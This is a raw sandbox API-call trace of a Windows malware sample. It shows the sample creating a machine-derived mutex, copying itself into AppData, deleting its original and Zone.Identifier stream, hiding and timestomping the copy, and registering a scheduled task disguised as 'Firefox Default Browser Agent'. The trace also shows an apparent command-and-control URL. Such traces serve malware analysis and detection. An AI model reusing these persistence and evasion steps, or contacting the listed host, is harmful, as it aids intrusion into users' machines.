Sleep (dwMilliseconds=0xa) [0116.169] Sleep (dwMilliseconds=0xa) [0116.185] Sleep (dwMilliseconds=0xa) [0116.203] Sleep (dwMilliseconds=0xa) [0116.216] Sleep (dwMilliseconds=0xa) [0116.231] Sleep (dwMilliseconds=0xa) [0116.279] Sleep (dwMilliseconds=0xa) [0116.298] Sleep (dwMilliseconds=0xa) [0116.309] Sleep (dwMilliseconds=0xa) [0116.325] Sleep (dwMilliseconds=0xa) [0116.341] Sleep (dwMilliseconds=0xa) [0116.356] Sleep (dwMilliseconds=0xa) [0116.372] Sleep (dwMilliseconds=0xa) [0116.389] Sleep (dwMilliseconds=0xa) [0116.403] Sleep (dwMilliseconds=0xa) [0116.450] Sleep (dwMilliseconds=0xa) [0116.465] Sleep (dwMilliseconds=0xa) [0116.495] Sleep (dwMilliseconds=0xa) [0116.497] Sleep (dwMilliseconds=0xa) [0116.512] Sleep (dwMilliseconds=0xa) [0116.529] Sleep (dwMilliseconds=0xa) [0116.543] Sleep (dwMilliseconds=0xa) [0116.568] Sleep (dwMilliseconds=0xa) [0116.619] Sleep (dwMilliseconds=0xa) [0116.673] Sleep (dwMilliseconds=0xa) [0116.685] GetSystemDirectoryA (in: lpBuffer=0x75df6c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.685] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" [0116.685] RtlGetVersion (in: lpVersionInformation=0x27a0457 | out: lpVersionInformation=0x27a0457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0116.686] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x75df6a8 | out: TokenHandle=0x75df6a8*=0x1500) returned 1 [0116.686] GetTokenInformation (in: TokenHandle=0x1500, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x75df6a0 | out: TokenInformation=0x0, ReturnLength=0x75df6a0) returned 0 [0116.686] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x25) returned 0x97d12f0 [0116.686] GetTokenInformation (in: TokenHandle=0x1500, TokenInformationClass=0x19, TokenInformation=0x97d12f0, TokenInformationLength=0x1c, ReturnLength=0x75df6a0 | out: TokenInformation=0x97d12f0, ReturnLength=0x75df6a0) returned 1 [0116.686] GetSidSubAuthorityCount (pSid=0x97d1300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x97d1301 [0116.686] GetSidSubAuthority (pSid=0x97d1300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x97d1308 [0116.686] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x25 [0116.687] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0116.687] CloseHandle (hObject=0x1500) returned 1 [0116.687] GetComputerNameA (in: lpBuffer=0x75df770, nSize=0x75df7b0 | out: lpBuffer="Q9IATRKPRH", nSize=0x75df7b0) returned 1 [0116.687] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x75df7a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x75df7a0*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0116.688] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x29) returned 0x97d12f0 [0116.688] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x14) returned 0x97d1330 [0116.688] wsprintfA (in: param_1=0x97d12f0, param_2="%s%08X%08X" | out: param_1="Q9IATRKPRH99FC78698443A5AF") returned 26 [0116.689] CryptAcquireContextA (in: phProv=0x75df6f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x75df6f8*=0x3f7f520) returned 1 [0116.692] CryptCreateHash (in: hProv=0x3f7f520, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x75df6f0 | out: phHash=0x75df6f0) returned 1 [0116.693] lstrlenA (lpString="Q9IATRKPRH99FC78698443A5AF") returned 26 [0116.693] CryptHashData (hHash=0x2569f20, pbData=0x97d12f0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0116.693] CryptGetHashParam (in: hHash=0x2569f20, dwParam=0x2, pbData=0x75df700, pdwDataLen=0x75df730, dwFlags=0x0 | out: pbData=0x75df700, pdwDataLen=0x75df730) returned 1 [0116.693] wsprintfA (in: param_1=0x27a020c, param_2="%02X" | out: param_1="4B") returned 2 [0116.693] wsprintfA (in: param_1=0x27a020e, param_2="%02X" | out: param_1="CD") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0210, param_2="%02X" | out: param_1="65") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0212, param_2="%02X" | out: param_1="9A") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0214, param_2="%02X" | out: param_1="D8") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0216, param_2="%02X" | out: param_1="F3") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0218, param_2="%02X" | out: param_1="47") returned 2 [0116.693] wsprintfA (in: param_1=0x27a021a, param_2="%02X" | out: param_1="B5") returned 2 [0116.693] wsprintfA (in: param_1=0x27a021c, param_2="%02X" | out: param_1="B4") returned 2 [0116.693] wsprintfA (in: param_1=0x27a021e, param_2="%02X" | out: param_1="51") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0220, param_2="%02X" | out: param_1="91") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0222, param_2="%02X" | out: param_1="8C") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0224, param_2="%02X" | out: param_1="D8") returned 2 [0116.693] wsprintfA (in: param_1=0x27a0226, param_2="%02X" | out: param_1="91") returned 2 [0116.694] wsprintfA (in: param_1=0x27a0228, param_2="%02X" | out: param_1="C8") returned 2 [0116.694] wsprintfA (in: param_1=0x27a022a, param_2="%02X" | out: param_1="23") returned 2 [0116.694] CryptDestroyHash (hHash=0x2569f20) returned 1 [0116.694] CryptReleaseContext (hProv=0x3f7f520, dwFlags=0x0) returned 1 [0116.694] wsprintfA (in: param_1=0x27a022c, param_2="%08X" | out: param_1="8443A5AF") returned 8 [0116.694] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d1330) returned 0x14 [0116.694] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d1330) returned 1 [0116.694] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x29 [0116.695] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0116.695] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0xe) returned 0x97d12f0 [0116.695] wsprintfA (in: param_1=0x27a0dbe, param_2="%sFF" | out: param_1="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 42 [0116.695] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0xe [0116.695] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0116.695] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned 0x1500 [0116.695] RtlGetLastWin32Error () returned 0x0 [0116.695] GetTickCount () returned 0xb2fb52 [0116.695] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1008) returned 0x97d12f0 [0116.696] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2e) returned 0x97d2300 [0116.697] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x75df7b8 | out: phkResult=0x75df7b8*=0x14dc) returned 0x0 [0116.697] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x14) returned 0x97d2340 [0116.697] RegQueryValueExA (in: hKey=0x14dc, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x75df740, lpcbData=0x75df7a0*=0x20 | out: lpType=0x0, lpData=0x75df740*=0x0, lpcbData=0x75df7a0*=0x20) returned 0x2 [0116.697] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2340) returned 0x14 [0116.697] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2340) returned 1 [0116.697] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x11) returned 0x97d2340 [0116.697] RegQueryValueExA (in: hKey=0x14dc, lpValueName="Version", lpReserved=0x0, lpType=0x0, lpData=0x75df740, lpcbData=0x75df7a0*=0x20 | out: lpType=0x0, lpData=0x75df740*=0x38, lpcbData=0x75df7a0*=0xf) returned 0x0 [0116.697] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2340) returned 0x11 [0116.697] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2340) returned 1 [0116.697] lstrlenA (lpString="8.0.7601.17514") returned 14 [0116.697] lstrlenA (lpString=".") returned 1 [0116.697] atoi (_Str="8") returned 8 [0116.697] RegCloseKey (hKey=0x14dc) returned 0x0 [0116.697] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x2e [0116.698] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0116.698] ObtainUserAgentString (in: dwOption=0x8, pszUAOut=0x97d12f0, cbSize=0x75df7a0 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x75df7a0) returned 0x0 [0116.706] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 183 [0116.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d12f0, cbMultiByte=184, lpWideCharStr=0x27a0577, cchWideChar=368 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 184 [0116.706] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d12f0) returned 0x1008 [0116.706] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d12f0) returned 1 [0116.707] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1008) returned 0x97d12f0 [0116.707] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1c) returned 0x97d2300 [0116.707] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x97d12f0, nSize=0x105 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0116.707] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x1c [0116.707] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0116.707] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x16) returned 0x97d2300 [0116.707] wsprintfW (in: param_1=0x27a07a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 42 [0116.707] wsprintfW (in: param_1=0x27a0bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj") returned 42 [0116.707] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x16 [0116.707] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0116.707] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x26) returned 0x97d2300 [0116.707] lstrlenA (lpString="http://file-coin-host-12.com/") returned 29 [0116.707] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x97d2300, Length=0x1d) returned 0x57488b3e [0116.707] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x26 [0116.708] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0116.708] lstrcmpW (lpString1="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 1 [0116.708] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0 [0116.708] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), bFailIfExists=0) returned 1 [0116.734] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe")) returned 1 [0116.740] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x97d2300 [0116.740] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2a) returned 0x97d2320 [0116.740] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x408) returned 0x97d2360 [0116.741] wsprintfW (in: param_1=0x97d2360, param_2="%s%s" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier") returned 58 [0116.741] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr:zone.identifier")) returned 0 [0116.741] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2360) returned 0x408 [0116.741] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2360) returned 1 [0116.741] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x12 [0116.741] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0116.741] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2320) returned 0x2a [0116.742] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2320) returned 1 [0116.742] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x16) returned 0x97d2300 [0116.742] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x210) returned 0x97d2320 [0116.742] GetSystemDirectoryA (in: lpBuffer=0x97d2320, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.742] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0116.742] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0116.742] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", dwFileAttributes=0x6) returned 1 [0116.742] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x14dc [0116.742] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x75df710 | out: lpFileInformation=0x75df710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0116.743] SetFileTime (hFile=0x14dc, lpCreationTime=0x75df714, lpLastAccessTime=0x75df71c, lpLastWriteTime=0x75df724) returned 1 [0116.743] CloseHandle (hObject=0x14dc) returned 1 [0116.743] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2320) returned 0x210 [0116.743] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2320) returned 1 [0116.743] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x16 [0116.743] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0116.743] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x418) returned 0x97d2300 [0116.743] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" [0116.743] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x212) returned 0x97d2720 [0116.743] GetUserNameW (in: lpBuffer=0x97d2720, pcbBuffer=0x75df750 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x75df750) returned 1 [0116.745] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x97d2940 [0116.745] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4c) returned 0x97d2a60 [0116.745] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x97d2ac0 [0116.745] wsprintfW (in: param_1=0x97d2940, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent 4BCD659AD8F347B5") returned 46 [0116.745] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2ac0) returned 0x10d [0116.745] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2ac0) returned 1 [0116.745] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2a60) returned 0x4c [0116.746] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2a60) returned 1 [0116.746] CoCreateInstance (in: rclsid=0x3a11010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x3a11000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x75df5e8 | out: ppv=0x75df5e8*=0x10aab0) returned 0x0 [0116.747] TaskScheduler:ITaskService:Connect (This=0x10aab0, serverName=0x75df660*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0), user=0x75df680*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0), domain=0x75df640*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0), password=0x75df6c0*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0)) returned 0x0 [0116.816] TaskScheduler:ITaskService:GetFolder (in: This=0x10aab0, Path="", ppFolder=0x75df608 | out: ppFolder=0x75df608*=0x126180) returned 0x0 [0116.818] ITaskFolder:DeleteTask (This=0x126180, Name="Firefox Default Browser Agent 4BCD659AD8F347B5", flags=0) returned 0x80070002 [0116.820] TaskScheduler:ITaskService:NewTask (in: This=0x10aab0, flags=0x0, ppDefinition=0x75df720 | out: ppDefinition=0x75df720*=0x12b900) returned 0x0 [0116.821] ITaskDefinition:get_RegistrationInfo (in: This=0x12b900, ppRegistrationInfo=0x75df620 | out: ppRegistrationInfo=0x75df620*=0x13bc00) returned 0x0 [0116.821] IRegistrationInfo:put_Author (This=0x13bc00, Author="kEecfMwgj") returned 0x0 [0116.821] IUnknown:Release (This=0x13bc00) returned 0x1 [0116.821] ITaskDefinition:get_Settings (in: This=0x12b900, ppSettings=0x75df5f8 | out: ppSettings=0x75df5f8*=0x13bd30) returned 0x0 [0116.822] ITaskSettings:put_StartWhenAvailable (This=0x13bd30, StartWhenAvailable=1) returned 0x0 [0116.822] IUnknown:Release (This=0x13bd30) returned 0x1 [0116.822] ITaskDefinition:get_Triggers (in: This=0x12b900, ppTriggers=0x75df600 | out: ppTriggers=0x75df600*=0x13bcc0) returned 0x0 [0116.822] ITriggerCollection:Create (in: This=0x13bcc0, Type=1, ppTrigger=0x75df710 | out: ppTrigger=0x75df710*=0x13c120) returned 0x0 [0116.822] IUnknown:QueryInterface (in: This=0x13c120, riid=0x3a11030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x75df5f0 | out: ppvObject=0x75df5f0*=0x13c120) returned 0x0 [0116.822] ITrigger:get_Repetition (in: This=0x13c120, ppRepeat=0x75df5e0 | out: ppRepeat=0x75df5e0*=0x12cb60) returned 0x0 [0116.822] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x14) returned 0x97d2a60 [0116.823] IRepetitionPattern:put_Interval (This=0x12cb60, Interval="PT10M") returned 0x0 [0116.894] ITrigger:put_Repetition (This=0x13c120, Repetition=0x12cb60) returned 0x0 [0116.894] IUnknown:Release (This=0x12cb60) returned 0x1 [0116.894] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x30) returned 0x97d2a80 [0116.894] ITrigger:put_StartBoundary (This=0x13c120, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0116.894] IUnknown:Release (This=0x13c120) returned 0x2 [0116.894] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2a80) returned 0x30 [0116.895] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2a80) returned 1 [0116.895] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2a60) returned 0x14 [0116.895] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2a60) returned 1 [0116.895] IUnknown:Release (This=0x13c120) returned 0x1 [0116.895] ITriggerCollection:Create (in: This=0x13bcc0, Type=9, ppTrigger=0x75df710 | out: ppTrigger=0x75df710*=0x13c360) returned 0x0 [0117.029] IUnknown:QueryInterface (in: This=0x13c360, riid=0x3a11020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x75df5e0 | out: ppvObject=0x75df5e0*=0x13c360) returned 0x0 [0117.030] ILogonTrigger:put_UserId (This=0x13c360, UserId="kEecfMwgj") returned 0x0 [0117.032] IUnknown:Release (This=0x13c360) returned 0x2 [0117.032] IUnknown:Release (This=0x13c360) returned 0x1 [0117.032] ITaskDefinition:get_Actions (in: This=0x12b900, ppActions=0x75df610 | out: ppActions=0x75df610*=0x10d790) returned 0x0 [0117.033] IActionCollection:Create (in: This=0x10d790, Type=0, ppAction=0x75df628 | out: ppAction=0x75df628*=0x13be90) returned 0x0 [0117.033] IUnknown:Release (This=0x10d790) returned 0x1 [0117.033] IUnknown:QueryInterface (in: This=0x13be90, riid=0x3a11040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x75df618 | out: ppvObject=0x75df618*=0x13be90) returned 0x0 [0117.033] IExecAction:put_Path (This=0x13be90, Path="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 0x0 [0117.033] IUnknown:Release (This=0x13be90) returned 0x2 [0117.033] ITaskFolder:RegisterTaskDefinition (in: This=0x126180, Path="Firefox Default Browser Agent 4BCD659AD8F347B5", pDefinition=0x12b900, flags=6, UserId=0x75df640*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0), password=0x75df680*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0), LogonType=3, sddl=0x75df660*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a15257, varVal2=0x0), ppTask=0x75df5e0 | out: ppTask=0x75df5e0*=0x12daa0) returned 0x0 [0117.685] IUnknown:Release (This=0x13be90) returned 0x1 [0117.685] IUnknown:Release (This=0x13bcc0) returned 0x1 [0117.685] TaskScheduler:IUnknown:Release (This=0x12b900) returned 0x0 [0117.685] TaskScheduler:IUnknown:Release (This=0x126180) returned 0x0 [0117.685] TaskScheduler:IUnknown:Release (This=0x10aab0) returned 0x0 [0117.686] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2940) returned 0x10d [0117.686] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2940) returned 1 [0117.686] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x418 [0117.687] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0117.687] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2720) returned 0x212 [0117.687] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2720) returned 1 [0117.687] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154c [0117.687] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 0x1380 [0117.687] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x26) returned 0x97d2300 [0117.687] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3026b562 [0117.688] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x46) 